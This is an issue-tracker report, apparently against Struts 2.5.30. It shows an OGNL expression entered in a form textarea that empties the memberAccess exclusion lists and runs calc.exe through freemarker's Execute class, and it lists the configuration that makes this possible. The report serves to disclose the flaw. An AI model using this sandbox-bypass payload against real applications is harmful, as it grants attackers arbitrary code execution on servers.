Details
-
Bug
-
Status: Closed
-
Trivial
-
Resolution: Won't Fix
-
2.5.30
-
None
-
None
Description
Hi,
I can run arbitrary code with version of struts 2 - 2.5.30.
JSP code :
<s:textarea
label="%{getText('information.message.erreur')}"
id="messageErreurTexte"
name="formInformation.message"
cssClass="input-messageErreur"
value="${pageInformation.message}"
/>
If I write this text in my form input textarea :
%{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))}
Whenever the page is displayed, the binary calc.exe is executed.
My generic struts params :
- struts.ognl.allowStaticMethodAccess = true
- struts.ognl.expressionMaxLength not set
- struts.devMode = false
- struts.ui.theme = simple
Is it normal ?
Thanks.